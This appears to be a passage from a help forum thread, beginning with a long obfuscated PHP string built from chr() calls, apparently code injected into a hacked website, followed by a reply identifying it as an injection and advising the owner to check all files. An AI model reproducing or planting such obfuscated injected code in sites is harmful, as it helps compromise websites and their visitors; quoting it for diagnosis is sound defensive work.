(53).chr(67).chr(74).chr(76).chr(100).chr(48).chr(112).chr(103).chr(110).chr(80).chr(54).chr(56).chr(77).chr(110).chr(74).chr(85).chr(56).chr(52).chr(69).chr(108).chr(112).chr(112).chr(49).chr(89).chr(79).chr(83).chr(53).chr(72).chr(111).chr(113).chr(57).chr(66).chr(68).chr(55).chr(68).chr(73).chr(52).chr(73).chr(83).chr(53).chr(116).chr(114).chr(83).chr(98).chr(101).chr(119).chr(54).chr(103).chr(88).chr(100).chr(98).chr(81).chr(106).chr(81).chr(75).chr(75).chr(102).chr(90).chr(115).chr(121).chr(97).chr(86).chr(112).chr(120).chr(66).chr(49).chr(79).chr(84).chr(116).chr(108).chr(112).chr(106).chr(101).chr(74).chr(116).chr(98).chr(56).chr(122).chr(66).chr(88).chr(85).chr(76).chr(106).chr(119).chr(79).chr(78).chr(68).chr(50).chr(52).chr(121).chr(102).chr(111).chr(121).chr(69).chr(74).chr(66).chr(107).chr(77).chr(117).chr(88).chr(103).chr(56).chr(80).chr(106).chr(68).chr(122).chr(85).chr(52).chr(101).chr(56).chr(105).chr(78).chr(65).chr(52).chr(105).chr(106).chr(52).chr(55).chr(49).chr(107).chr(76).chr(113).chr(89).chr(66).chr(122).chr(84).chr(83).chr(104).chr(52).chr(122).chr(52).chr(105).chr(56).chr(86).chr(88).chr(48).chr(106).chr(78).chr(47).chr(78).chr(53).chr(105).chr(102).chr(82).chr(113).chr(54).chr(73).chr(103).chr(109).chr(55).chr(75).chr(57).chr(101).chr(121).chr(76).chr(75).chr(54).chr(103).chr(65).chr(48).chr(88).chr(90).chr(73).chr(120).chr(79).chr(116).chr(88).chr(107).chr(56).chr(101).chr(101).chr(75).chr(103).chr(48).chr(68).chr(68).chr(43).chr(65).chr(75).chr(119).chr(52).chr(87).chr(53).chr(112).chr(79).chr(107).chr(74).chr(110).chr(52).chr(82).chr(69).chr(76).chr(119).chr(104).chr(109).chr(83).chr(120).chr(71).chr(78).chr(105).chr(71).chr(82).chr(57).chr(77).chr(86).chr(116).chr(70).chr(55).chr(76).chr(100).chr(80).chr(102).chr(122).chr(50).chr(117).chr(98).chr(119).chr(74).chr(111).chr(54).chr(67).chr(114).chr(80).chr(109).chr(119).chr(51).chr(81).chr(71).chr(81).chr(112).chr(56).chr(57).chr(85).chr(57).chr(108).chr(105).chr(50).chr(122).chr(103).chr(85).chr(82).chr(113).chr(71).chr(119).chr(114).chr(101).chr(65).chr(116).chr(67).chr(65).chr(82).chr(84).chr(98).chr(108).chr(54).chr(48).chr(122).chr(73).chr(86).chr(85).chr(55).chr(65).chr(72).chr(122).chr(82).chr(65).chr(74).chr(69).chr(119).chr(74).chr(101).chr(47).chr(119).chr(100).chr(119).chr(90).chr(114).chr(77).chr(70).chr(78).chr(112).chr(111).chr(70).chr(87).chr(48).chr(103).chr(52).chr(67).chr(48).chr(109).chr(107).chr(53).chr(113).chr(88).chr(88).chr(85).chr(82).chr(54).chr(100).chr(110).chr(72).chr(122).chr(106).chr(47).chr(65).chr(51).chr(113).chr(122).chr(55).chr(110).chr(51).chr(115).chr(80).chr(51).chr(49).chr(105).chr(100).chr(76).chr(84).chr(68).chr(115).chr(122).chr(100).chr(54).chr(84).chr(82).chr(109).chr(90).chr(79).chr(67).chr(77).chr(77).chr(72).chr(101).chr(72).chr(113).chr(109).chr(75).chr(111).chr(57).chr(43).chr(75).chr(52).chr(72).chr(81).chr(50).chr(103).chr(56).chr(114).chr(89).chr(101).chr(90).chr(106).chr(83).chr(101).chr(102).chr(111).chr(85).chr(68).chr(76).chr(48).chr(49).chr(105).chr(121).chr(73).chr(74).chr(78).chr(69).chr(52).chr(75).chr(90).chr(79).chr(43).chr(122).chr(113).chr(111).chr(121).chr(84).chr(113).chr(65).chr(117).chr(70).chr(72).chr(88).chr(81).chr(80).chr(101).chr(43).chr(112).chr(82).chr(51).chr(57).chr(83).chr(69).chr(102).chr(84).chr(98).chr(118).chr(71).chr(101).chr(68).chr(122).chr(117).chr(54).chr(106).chr(110).chr(57).chr(67).chr(47).chr(50).chr(86).chr(99).chr(111).chr(73).chr(106).chr(106).chr(122).chr(120).chr(102).chr(83).chr(66).chr(80).chr(78).chr(85).chr(67).chr(113).chr(102).chr(122).chr(97).chr(119).chr(105).chr(106).chr(122).chr(84).chr(116).chr(98).chr(75).chr(50).chr(78).chr(86).chr(75).chr(50).chr(90).chr(51).chr(79).chr(56).chr(111).chr(111).chr(118).chr(82).chr(113).chr(83).chr(115).chr(57).chr(87).chr(72).chr(71).chr(104).chr(69).chr(72).chr(70).chr(111).chr(71).chr(121).chr(66).chr(113).chr(53).chr(65).chr(70).chr(67).chr(110).chr(99).chr(83).chr(109).chr(113).chr(67).chr(120).chr(72).chr(103).chr(54).chr(101).chr(84).chr(102).chr(87).chr(102).chr(47).chr(73).chr(114).chr(77).chr(104).chr(122).chr(52).chr(117).chr(89).chr(121).chr(80).chr(47).chr(116).chr(50).chr(81).chr(53).chr(113).chr(81).chr(119).chr(113).chr(103).chr(73).chr(76).chr(102).chr(83).chr(117).chr(114).chr(102).chr(84).chr(104).chr(119).chr(87).chr(120).chr(70).chr(82).chr(66).chr(120).chr(68).chr(88).chr(54).chr(111).chr(113).chr(65).chr(108).chr(99).chr(121).chr(105).chr(118).chr(108).chr(69).chr(76).chr(84).chr(116).chr(89).chr(82).chr(49).chr(107).chr(85).chr(80).chr(71).chr(67).chr(54).chr(115).chr(88).chr(69).chr(57).chr(98).chr(101).chr(48).chr(115).chr(104).chr(109).chr(114).chr(110).chr(83).chr(68).chr(114).chr(119).chr(103).chr(108).chr(77).chr(85).chr(101).chr(76).chr(97).chr(121).chr(102).chr(113).chr(89).chr(75).chr(121).chr(111).chr(55).chr(85).chr(86).chr(107).chr(76).chr(105).chr(56).chr(121).chr(97).chr(113).chr(87).chr(116).chr(67).chr(101).chr(52).chr(117).chr(122).chr(53).chr(114).chr(54).chr(49).chr(65).chr(73).chr(78).chr(100).chr(69).chr(43).chr(47).chr(67).chr(122).chr(85).chr(69).chr(121).chr(84).chr(81).chr(72).chr(67).chr(51).chr(105).chr(88).chr(65).chr(47).chr(111).chr(87).chr(72).chr(75).chr(105).chr(89).chr(88).chr(54).chr(50).chr(72).chr(48).chr(50).chr(89).chr(70).chr(66).chr(122).chr(88).chr(104).chr(78).chr(57).chr(50).chr(100).chr(104).chr(116).chr(109).chr(73).chr(50).chr(71).chr(104).chr(87).chr(105).chr(77).chr(51).chr(89).chr(66).chr(80).chr(73).chr(73).chr(97).chr(43).chr(68).chr(90).chr(81).chr(80).chr(81).chr(107).chr(53).chr(89).chr(77).chr(50).chr(90).chr(48).chr(69).chr(72).chr(106).chr(78).chr(66).chr(47).chr(57).chr(52).chr(80).chr(73).chr(74).chr(121).chr(79).chr(87).chr(69).chr(52).chr(83).chr(110).chr(122).chr(75).chr(82).chr(118).chr(113).chr(84).chr(119).chr(71).chr(85).chr(48).chr(111).chr(84).chr(55).chr(88).chr(55).chr(52).chr(88).chr(120).chr(69).chr(75).chr(117).chr(70).chr(115).chr(55).chr(48).chr(116).chr(79).chr(74).chr(113).chr(49).chr(109).chr(67).chr(89).chr(67).chr(90).chr(71).chr(53).chr(98).chr(82).chr(90).chr(99).chr(112).chr(118).chr(104).chr(84).chr(111).chr(78).chr(76).chr(67).chr(110).chr(81).chr(56).chr(109).chr(105).chr(102).chr(99).chr(99).chr(80).chr(48).chr(50).chr(81).chr(73).chr(53).chr(100).chr(87).chr(83).chr(103).chr(119).chr(47).chr(118).chr(80).chr(108).chr(51).chr(79).chr(102).chr(51).chr(55).chr(53).chr(89).chr(118).chr(55).chr(118).chr(88).chr(121).chr(53).chr(115).chr(97).chr(88).chr(47).chr(72).chr(114).chr(71).chr(49).chr(76).chr(108).chr(114).chr(69).chr(112).chr(52).chr(119).chr(57).chr(118).chr(80).chr(47).chr(55).chr(52).chr(68).chr(106).chr(66).chr(53).chr(57).chr(99).chr(78).chr(76).chr(87).chr(120).chr(112).chr(121).chr(72).chr(106).chr(99).chr(78).chr(81).chr(47).chr(83).chr(101).chr(99).chr(69).chr(103).chr(84).chr(51).chr(116).chr(121).chr(118).chr(71).chr(122).chr(71).chr(48).chr(82).chr(99).chr(71).chr(88).chr(85).chr(76).chr(73).chr(50).chr(106).chr(90).chr(118).chr(116).chr(66).chr(121).chr(122).chr(82).chr(107).chr(51).chr(84).chr(90).chr(85).chr(109).chr(98).chr(110).chr(56).chr(57).chr(74).chr(75).chr(121).chr(85).chr(55).chr(111).chr(86).chr(110).chr(70).chr(69).chr(121).chr(47).chr(119).chr(54).chr(98).chr(118).chr(43).chr(108).chr(102).chr(100).chr(119).chr(43).chr(122).chr(111).chr(54).chr(111).chr(116).chr(85).chr(76).chr(54).chr(98).chr(122).chr(116).chr(68).chr(105).chr(78).chr(119).chr(49).chr(101).chr(112).chr(115).chr(100).chr(52).chr(71).chr(57).chr(118).chr(85).chr(43).chr(49).chr(56).chr(50).chr(122).chr(88).chr(107).chr(117).chr(49).chr(47).chr(50).chr(78).chr(116).chr(100).chr(73).chr(101).chr(104).chr(85).chr(69).chr(71).chr(80).chr(114).chr(112).chr(52).chr(106).chr(56).chr(47).chr(110).chr(86).chr(43).chr(75).chr(104).chr(99).chr(85).chr(120).chr(97).chr(57).chr(112).chr(121).chr(71).chr(113).chr(51).chr(114).chr(54).chr(111).chr(55).chr(90).chr(75).chr(47).chr(103).chr(108).chr(75).chr(67).chr(105).chr(102).chr(90).chr(88).chr(47).chr(117).chr(114).chr(67).chr(84).chr(99).chr(98).chr(74).chr(90).chr(120).chr(69).chr(97).chr(120).chr(48).chr(74).chr(87).chr(85).chr(104).chr(48).chr(79).chr(50).chr(55).chr(57).chr(43).chr(102).chr(122).chr(57).chr(49).chr(100).chr(55).chr(122).chr(57).chr(113).chr(121).chr(118).chr(114).chr(83).chr(67).chr(76).chr(107).chr(50).chr(110).chr(85).chr(43).chr(120).chr(53).chr(68).chr(77).chr(83).chr(116).chr(77).chr(115).chr(88).chr(106).chr(57).chr(112).chr(79).chr(106).chr(107).chr(55).chr(90).chr(122).chr(55).chr(56).chr(69).chr(68).chr(121).chr(68).chr(67).chr(122).chr(83).chr(80).chr(71).chr(121).chr(102).chr(113).chr(51).chr(79).chr(77).chr(104).chr(115).chr(103).chr(70).chr(70).chr(109).chr(122).chr(101).chr(110).chr(84).chr(48).chr(116).chr(78).chr(81).chr(122).chr(111).chr(75).chr(120).chr(81).chr(114).chr(120).chr(120).chr(114).chr(112).chr(117).chr(69).chr(65).chr(99).chr(119).chr(104).chr(88).chr(112).chr(50).chr(51).chr(117).chr(83).chr(74).chr(89).chr(81).chr(110).chr(78).chr(112).chr(109).chr(111).chr(121).chr(112).chr(100).chr(83).chr(55).chr(55).chr(86).chr(120).chr(119).chr(110).chr(90).chr(97).chr(84).chr(103).chr(107).chr(99).chr(113).chr(108).chr(72).chr(49).chr(66).chr(87).chr(108).chr(112).chr(107).chr(115).chr(98).chr(122).chr(56).chr(106).chr(69).chr(104).chr(116).chr(115).chr(101).chr(112).chr(121).chr(69).chr(72).chr(86).chr(47).chr(102).chr(116).chr(104).chr(51).chr(78).chr(81).chr(102).chr(118).chr(47).chr(113).chr(57).chr(81).chr(57).chr(118).chr(119).chr(66).chr(107).chr(109).chr(66).chr(47).chr(106).chr(66).chr(84).chr(72).chr(65).chr(84).chr(90).chr(73).chr(48).chr(54).chr(119).chr(67).chr(87).chr(117).chr(82).chr(43).chr(74).chr(66).chr(84).chr(88).chr(77).chr(83).chr(74).chr(86).chr(65).chr(90).chr(83).chr(99).chr(89).chr(65).chr(77).chr(97).chr(73).chr(77).chr(120).chr(73).chr(103).chr(67).chr(90).chr(85).chr(98).chr(72).chr(68).chr(109).chr(68).chr(113).chr(43).chr(68).chr(81).chr(109).chr(107).chr(83).chr(76).chr(54).chr(83).chr(109).chr(111).chr(114).chr(85).chr(66).chr(68).chr(69).chr(85).chr(102).chr(84).chr(80).chr(82).chr(110).chr(86).chr(112).chr(66).chr(80).chr(70).chr(52).chr(111).chr(113).chr(120).chr(108).chr(49).chr(74).chr(74).chr(108).chr(114).chr(113).chr(53).chr(81).chr(85).chr(53).chr(102).chr(117).chr(102).chr(105).chr(100).chr(79).chr(90).chr(50).chr(86).chr(106).chr(49).chr(107).chr(120).chr(48).chr(100).chr(115).chr(103).chr(69).chr(112).chr(105).chr(85).chr(110).chr(72).chr(49).chr(106).chr(121).chr(104).chr(89).chr(65).chr(66).chr(118).chr(85).chr(111).chr(114).chr(51).chr(53).chr(87).chr(113).chr(53).chr(101).chr(107).chr(115).chr(78).chr(72).chr(114).chr(53).chr(67).chr(116).chr(107).chr(65).chr(89).chr(57).chr(122).chr(53).chr(84).chr(57).chr(109).chr(54).chr(114).chr(54).chr(67).chr(88).chr(119).chr(77).chr(111).chr(112).chr(49).chr(78).chr(100).chr(78).chr(53).chr(103).chr(50).chr(119).chr(70).chr(83).chr(71).chr(90).chr(117).chr(117).chr(74).chr(82).chr(121).chr(99).chr(74).chr(85).chr(47).chr(107).chr(67).chr(121).chr(73).chr(118).chr(83).chr(113).chr(97).chr(54).chr(78).chr(87).chr(69).chr(97).chr(78).chr(101).chr(107).chr(101).chr(101).chr(113).chr(114).chr(112).chr(122).chr(74).chr(75).chr(105).chr(97).chr(107).chr(65).chr(51).chr(80).chr(98).chr(87).chr(106).chr(54).chr(108).chr(103).chr(99).chr(104).chr(113).chr(68).chr(98).chr(53).chr(114).chr(75).chr(57).chr(50).chr(56).chr(73).chr(49).chr(69).chr(78).chr(54).chr(49).chr(107).chr(86).chr(113).chr(74).chr(52).chr(116).chr(108).chr(97).chr(57).chr(107).chr(54).chr(74).chr(116).chr(51).chr(117).chr(48).chr(98).chr(88).chr(85).chr(79).chr(71).chr(112).chr(70).chr(81).chr(47).chr(90).chr(107).chr(70).chr(90).chr(51).chr(102).chr(86).chr(87).chr(117).chr(115).chr(74).chr(114).chr(47).chr(113).chr(43).chr(48).chr(110).chr(49).chr(72).chr(48).chr(109).chr(54).chr(75).chr(67).chr(87).chr(99).chr(113).chr(105).chr(56).chr(121).chr(108).chr(53).chr(86).chr(70).chr(80).chr(118).chr(56).chr(120).chr(55).chr(102).chr(90).chr(52).chr(47).chr(74).chr(105).chr(88).chr(113).chr(108).chr(88).chr(115).chr(52).chr(115).chr(85).chr(88).chr(79).chr(67).chr(89).chr(51).chr(76).chr(107).chr(116).chr(100).chr(86).chr(107).chr(51).chr(65).chr(112).chr(76).chr(83).chr(57).chr(57).chr(68).chr(88).chr(72).chr(114).chr(90).chr(80).chr(107).chr(65).chr(70).chr(73).chr(108).chr(104).chr(70).chr(113).chr(118).chr(90).chr(117).chr(119).chr(49).chr(83).chr(85).chr(107).chr(67).chr(115).chr(111).chr(119).chr(57).chr(97).chr(114).chr(115).chr(115).chr(116).chr(120).chr(88).chr(116).chr(54).chr(86).chr(72).chr(111).chr(117).chr(71).chr(104).chr(74).chr(87).chr(43).chr(111).chr(102).chr(70).chr(105).chr(104).chr(86).chr(78).chr(43).chr(110).chr(85).chr(85).chr(84).chr(99).chr(118).chr(78).chr(72).chr(102).chr(70).chr(55).chr(99).chr(84).chr(43).chr(71).chr(98).chr(117).chr(47).chr(112).chr(104).chr(66).chr(117).chr(89).chr(113).chr(77).chr(75).chr(115).chr(74).chr(85).chr(115).chr(56).chr(90).chr(68).chr(89).chr(76).chr(74).chr(54).chr(121).chr(121).chr(99).chr(48).chr(122).chr(49).chr(77).chr(107).chr(117).chr(111).chr(75).chr(52).chr(98).chr(118).chr(116).chr(81).chr(67).chr(69).chr(110).chr(109).chr(89).chr(116).chr(98).chr(50).chr(65).chr(69).chr(73).chr(47).chr(117).chr(43).chr(56).chr(121).chr(54).chr(122).chr(86).chr(50).chr(74).chr(50).chr(107).chr(102).chr(120).chr(103).chr(98).chr(49).chr(109).chr(114).chr(103).chr(67).chr(77).chr(114).chr(104).chr(53).chr(49).chr(115).chr(83).chr(81).chr(115).chr(99).chr(104).chr(97).chr(117).chr(57).chr(79).chr(65).chr(115).chr(76).chr(79).chr(49).chr(111).chr(52).chr(89).chr(112).chr(100).chr(51).chr(84).chr(100).chr(74).chr(119).chr(102).chr(48).chr(109).chr(113).chr(86).chr(100).chr(48).chr(56).chr(54).chr(115).chr(47).chr(74).chr(97).chr(85).chr(99).chr(89).chr(101).chr(122).chr(108).chr(65).chr(65).chr(97).chr(117).chr(76).chr(80).chr(84).chr(117).chr(54).chr(113).chr(105).chr(99).chr(112).chr(97).chr(53).chr(70).chr(117).chr(122).chr(81).chr(114).chr(79).chr(113).chr(55).chr(71).chr(120).chr(117).chr(102).chr(48).chr(82).chr(55).chr(85).chr(113).chr(108).chr(87).chr(57).chr(114).chr(112).chr(50).chr(66).chr(47).chr(119).chr(112).chr(106).chr(77).chr(111).chr(54).chr(111).chr(51).chr(98).chr(118).chr(84).chr(68).chr(81).chr(49).chr(54).chr(47).chr(85).chr(97).chr(118).chr(90).chr(77).chr(122).chr(49).chr(51).chr(90).chr(87).chr(99).chr(121).chr(83).chr(75).chr(85).chr(100).chr(48).chr(112).chr(53).chr(89).chr(80).chr(87).chr(101).chr(119).chr(74).chr(112).chr(47).chr(104).chr(78).chr(97).chr(48).chr(69).chr(66).chr(88).chr(56).chr(122).chr(77).chr(81).chr(49).chr(97).chr(49).chr(98).chr(115).chr(83).chr(86).chr(72).chr(69).chr(98).chr(115).chr(120).chr(115).chr(84).chr(57).chr(117).chr(57).chr(104).chr(84).chr(66).chr(76).chr(67).chr(118).chr(54).chr(49).chr(67).chr(114).chr(70).chr(76).chr(73).chr(75).chr(49).chr(105).chr(55).chr(66).chr(97).chr(90).chr(76).chr(76).chr(69).chr(83).chr(102).chr(69).chr(83).chr(52).chr(110).chr(107).chr(67).chr(52).chr(65).chr(65).chr(78).chr(109).chr(107).chr(88).chr(75).chr(111).chr(43).chr(77).chr(48).chr(111).chr(52).chr(55).chr(110).chr(119).chr(114).chr(118).chr(99).chr(87).chr(90).chr(86).chr(77).chr(103).chr(76).chr(73).chr(68).chr(57).chr(72).chr(52).chr(73).chr(116).chr(111).chr(88).chr(69).chr(49).chr(66).chr(71).chr(51).chr(118).chr(55).chr(116).chr(98).chr(113).chr(100).chr(82).chr(79).chr(55).chr(49).chr(84).chr(51).chr(115).chr(117).chr(86).chr(53).chr(116).chr(118).chr(55).chr(43).chr(51).chr(97).chr(47).chr(98).chr(51).chr(77).chr(72).chr(90).chr(78).chr(88).chr(79).chr(118).chr(88).chr(43).chr(56).chr(86).chr(111).chr(57).chr(67).chr(102).chr(77).chr(121).chr(54).chr(110).chr(112).chr(49).chr(116).chr(89).chr(87).chr(71).chr(112).chr(79).chr(100).chr(87).chr(118).chr(50).chr(50).chr(85).chr(54).chr(115).chr(51).chr(90).chr(68).chr(117).chr(98).chr(74).chr(43).chr(67).chr(105).chr(77).chr(101).chr(72).chr(97).chr(115).chr(90).chr(99).chr(85).chr(97).chr(71).chr(115).chr(76).chr(74).chr(112).chr(72).chr(47).chr(65).chr(103).chr(98).chr(54).chr(108).chr(78).chr(56).chr(61))));
echo '
</body></html>';
}


That looks like you got hacked. This particular injection is nasty looking code (though I haven't decoded it to see what it's trying to do), but it really shouldn't be there. You should check all your files for similar sorts of code.

Advertisement: